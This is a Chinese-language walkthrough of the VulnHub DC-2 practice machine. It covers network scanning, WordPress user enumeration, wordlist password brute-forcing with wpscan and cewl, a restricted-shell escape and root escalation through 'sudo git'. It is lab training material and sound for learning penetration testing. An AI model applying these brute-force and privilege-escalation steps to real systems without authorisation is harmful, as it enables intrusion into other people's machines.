首页 > 其他分享 >vulnhub靶机:dc-2

vulnhub靶机:dc-2

时间:2024-02-29 19:11:22浏览次数:22  
标签:bin -- 扫描 jerry dc 网站 vulnhub 靶机 txt

一:主机发现

arp-scan -I eth0 10.4.7.0/24

kali ip:10.4.7.128

靶机IP:10.4.7.151

二:端口扫描

nmap -T4 -sV -p- -A 10.4.7.151

三:信息收集

无法访问更改host文件

vim /etc/hosts

通过flag1的提示,我们需要使用cewl爆破出用户名和密码,因为他用wordpress框架搭建,我们先使用wpscan扫描一下,查一下用户名

wpscan --url http://dc-2/ -e u

WPScan是一个用于扫描WordPress网站的工具,可以帮助发现网站的安全漏洞和弱点。以下是一些常用的WPScan参数:

  1. -u, --url:指定要扫描的WordPress网站的URL。
  2. -f, --force:强制重新扫描网站,即使已经扫描过。
  3. -e, --enumerate:枚举网站的信息,如插件、主题、用户等。
  4. --plugins-detection:检测网站上安装的插件。
  5. --themes-detection:检测网站上安装的主题。
  6. --users-detection:检测网站上的用户。
  7. --scan:执行完整的漏洞扫描。
  8. --wordlist:指定密码破解时使用的字典文件。
  9. --proxy:指定使用代理服务器进行扫描。
  10. --update:更新WPScan工具到最新版本。

发现三个用户名

admin

jerry

tom

先添加到新创建的用户名字典中

vim user.txt

然后使用cewl生成密码

cewl -w 1.txt http://dc-2/

查看一下7.txt里的内容

cat 1.txt

然后进行密码爆破:

wpscan --ignore-main-redirect --url 10.4.7.151 -U user.txt -P 1.txt --force

ignore-main-redirect是WPScan的一个参数,用于在扫描时忽略主要的重定向。这个参数可以在扫描中排除主要的重定向,以避免影响扫描结果。如果网站有主要的重定向,可以使用这个参数来忽略它,从而更准确地扫描网站的安全性。在使用WPScan时,可以添加--ignore-main-redirect参数来启用这个功能。

扫到两个结果

jerry adipiscing

tom parturient

因为是wordpress搭建的网站,所以访问这个地址

http;//dc-2/wp-admin

登录jerry用户

flag2中提示我们如果不能继续攻击 wordPress就想想其他方法吧,还记得7744端口跑的ssh吗,我们尝试下它。

ssh [email protected] -p 7744

成功进入但是很多命令无法用

使用命令交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

也不行

利用rbash逃逸,先查看看可以使用的命令 echo $PATH

echo /home/tom/usr/bin/*

rbash是一个受限的shell,通常用于限制用户的操作权限。但是,有时候可能会存在rbash逃逸的漏洞,允许用户绕过这些限制并执行潜在危险的操作。

less、ls、vi命令可以使用

绕过方法:

less绕过:$less test !‘sh’ls

绕过:$man ls !‘sh’vi

绕过:$vi test !/bin/sh 或 !/bin/bash

这里我们使用这种绕过方法:

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
cat flag3.txt

flag3提示我们查看jerry用户。我们切换到jerry用户中。 我们切换到jerry用户当中去

su jerry

flag4告诉我们还没有结束,文中有一个git这是一个很重要的关键词。

四:提权

无法切换到 root目录权限不够,查看下具有root权限的命令

看到了flag4中提示我们的git,我们使用git进行提权

jerry被赋予了特殊的权限,可以无密码使用sudo git

sudo git -p help
!/bin/bash

git提权原理:

因为sudo 的权限具有传递性,相当于root执行了bash 则直接提升至root权限

标签:bin,--,扫描,jerry,dc,网站,vulnhub,靶机,txt
From: https://www.cnblogs.com/woaishuaidan/p/18045172

相关文章

  • leedcode 二叉树的前序遍历
    递归法:classSolution:def__init__(self):#初始化一个实例变量res用于存储前序遍历结果self.res=[]defpreorderTraversal(self,root:Optional[TreeNode])->List[int]:#如果根节点存在ifroot:#检查根......
  • vulnhub靶机:dc-1
    一:信息收集1:主机发现arp-scan-Ieth010.4.7.0/24kali的IP:10.4.7.128靶机ip:10.4.7.1502:端口扫描nmap-T4-sV-p--A10.4.7.1503:信息收集启动Metersploit:msfconsole用search命令查找与Drupal有关的漏洞:searchdrupal选取2018的进行测试,因为有远程代码执行漏......
  • BOSHIDA DC电源模块如何故障排除与维修
    BOSHIDADC电源模块如何故障排除与维修首先,进行故障排查前,需要了解DC电源模块的工作原理和基本构造。DC电源模块通常由输入端子、输出端子、电感、电容、变压器、整流电路等组成。常见的故障包括输出电压异常、输出电流异常、过载保护触发、短路保护触发、输入电压异常等。 ......
  • b2r-dc-2
    b2r-dc-2一信息收集1.主机发现2.端口扫描80进不去改hosts访问80并查看flagvim/etc/hosts!!kali用户不行80查看flag网站架构是wordpress扫描漏洞wpscan扫描漏洞得出用户名┌──(root......
  • leedcode 环形链表
    快慢指针:classSolution:defhasCycle(self,head:Optional[ListNode])->bool:#如果链表为空或者只有一个节点,肯定不存在环ifnotheadornothead.next:returnFalse#初始化慢指针和快指针slow=headf......
  • 在K8S中,etcdctl如何使用?
    在Kubernetes(K8s)中,etcdctl是用于直接与etcd集群交互的命令行工具,主要用于管理和调试etcd存储中的键值对数据。etcd是K8s集群的核心组件之一,它作为一个高可用的分布式键值存储系统,用于保存集群的所有重要配置数据。以下是如何在Kubernetes环境中使用etcdctl的基本......
  • vulnhub靶机:doubletrouble
    一:信息收集1:主机发现2:端口扫描3:敏感目录探测二:渗透测试1:敏感目录扫到三个需要重点关注http://10.4.7.140/core发现该目录下存在很多敏感文件,其中有一个文件下有邮箱用户名和密码,应该是mysql数据库的用户名和密码http://10.4.7.140/uploads猜测该目录应该是登陆后上传......
  • vulnhub靶机:venus
    一:主机发现arp-scan-Ieth010.4.7.0/24二:端口扫描发现开放了22和8080端口三:敏感目录扫描四:渗透测试访问8080端口他说来宾用户可以登录我们找到一个/admin目录访问:http://10.4.7.142:8080/admin它将我们重定向到Django管理登录门户:http://10.4.7.142:8080/adm......
  • vulnhub靶机:thm-contain
    一:信息收集1:主机发现foriin{1..254};do(ping10.4.7.$i-c1-w5>/dev/null&&echo"10.4.7.$i"&);done2:扫描端口forportin{1..65535};doecho>/dev/tcp/10.4.7.134/$port&&echo"port$portisopen"done2>......
  • vulnhub靶机:cereal
    一:信息收集1:主机发现2:端口扫描3:敏感目录扫描二:外部信息1:先试试ftp登录nmap扫到的结果显示它支持匿名登录df4770f645f9ba25c8b90c55760e82950d6245c0ad78ce8ddcdbd6c4947b1da2没发现什么东西2:http登录发现一个域名cereal.ctf扫一下目录sudogobusterdir-uht......